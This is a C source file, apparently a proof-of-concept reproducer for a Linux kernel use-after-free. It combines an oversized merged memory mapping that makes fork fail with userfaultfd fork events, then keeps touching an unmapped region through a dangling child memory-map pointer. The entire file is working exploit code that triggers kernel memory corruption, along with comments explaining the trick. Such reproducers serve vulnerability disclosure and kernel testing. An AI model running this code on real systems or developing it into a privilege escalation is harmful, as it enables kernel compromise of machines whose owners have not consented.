#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <err.h>
#include <unistd.h>
#include <assert.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>
#include <linux/userfaultfd.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static int uffds[2];
static char *post_area;
static unsigned long mmap_size;

static void *thread_fn(void *dummy) {
  // Read userfaultfd event from the first uffd, but leave the event on the
  // second uffd pending to keep the mm alive.
  struct uffd_msg msg;
  SYSCHK(read(uffds[0], &msg, sizeof(msg)));
  assert(msg.event == UFFD_EVENT_FORK);
  int child_uffd = msg.arg.fork.ufd;

  // Get rid of the VMA at "post_area".
  SYSCHK(munmap(post_area, 0x1000));

  // Keep accessing the VMA through the nascent child MM's dangling pointer.
  while (1) {
    struct uffdio_register reg = {
      .range = { .start = (unsigned long)post_area, .len = 0x1000 },
      .mode = UFFDIO_REGISTER_MODE_WP
    };
    ioctl(child_uffd, UFFDIO_REGISTER, &reg);
    usleep(100*1000);
  }
}

int main(void) {
  setbuf(stdout, NULL);
  printf("running as pid %d\n", getpid());
  /*
   * ensure right capability state (must have CAP_SYS_PTRACE but not
   * CAP_SYS_ADMIN)
   */
  struct __user_cap_header_struct cap_header = {
    .version = _LINUX_CAPABILITY_VERSION_3
  };
  struct __user_cap_data_struct cap_data[2] = {{
    .effective = 1<<CAP_SYS_PTRACE,
    .permitted = 1<<CAP_SYS_PTRACE,
    .inheritable = 1<<CAP_SYS_PTRACE
  }};
  SYSCHK(syscall(__NR_capset, &cap_header, cap_data));


  /*
   * The following code assumes that we're running with vm.overcommit_memory=0
   * (guess mode, the default).
   * Overcommit guess mode only compares the size of an individual VMA with the
   * amount of total RAM plus swap (see __vm_enough_memory()).
   * This has the fun property that if we create two VMAs that are individually
   * below the limit, and then merge them, we get a VMA whose size is over the
   * limit. And if we then call fork(), dup_mmap() will fail on this VMA.
   */
  mmap_size = 0x2000;
  while (1) {
    char *p = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
      break;
    munmap(p, mmap_size);
    mmap_size *= 2;
  }
  printf("mmap failed with size 0x%lx\n", mmap_size);
  unsigned long half_size = mmap_size/2;
  printf("will create two halves with size 0x%lx\n", half_size);
  char *pre_area = SYSCHK(mmap(NULL, 0x2000+mmap_size+0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  char *area = pre_area + 0x2000;
  post_area = area + mmap_size;
  SYSCHK(mmap(area, half_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0));
  SYSCHK(mmap(area+half_size, half_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0));
  printf("created oversized VMA at %p\n", area);
  /* WARNING: fork() won't work in this process after this point */

  /*
   * Create two userfaultfds with fork support that are registered on VMAs
   * directly preceding the VMA that can't be copied.
   */
  for (int i=0; i<2; i++) {
    uffds[i] = SYSCHK(syscall(__NR_userfaultfd, UFFD_USER_MODE_ONLY));
    struct uffdio_api api = { .api = UFFD_API, .features = UFFD_FEATURE_EVENT_FORK };
    SYSCHK(ioctl(uffds[i], UFFDIO_API, &api));
    struct uffdio_register reg = {
      .range = { .start = (unsigned long)pre_area+i*0x1000, .len = 0x1000 },
      .mode = UFFDIO_REGISTER_MODE_WP
    };
    SYSCHK(ioctl(uffds[i], UFFDIO_REGISTER, &reg));
  }

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  fork();
}
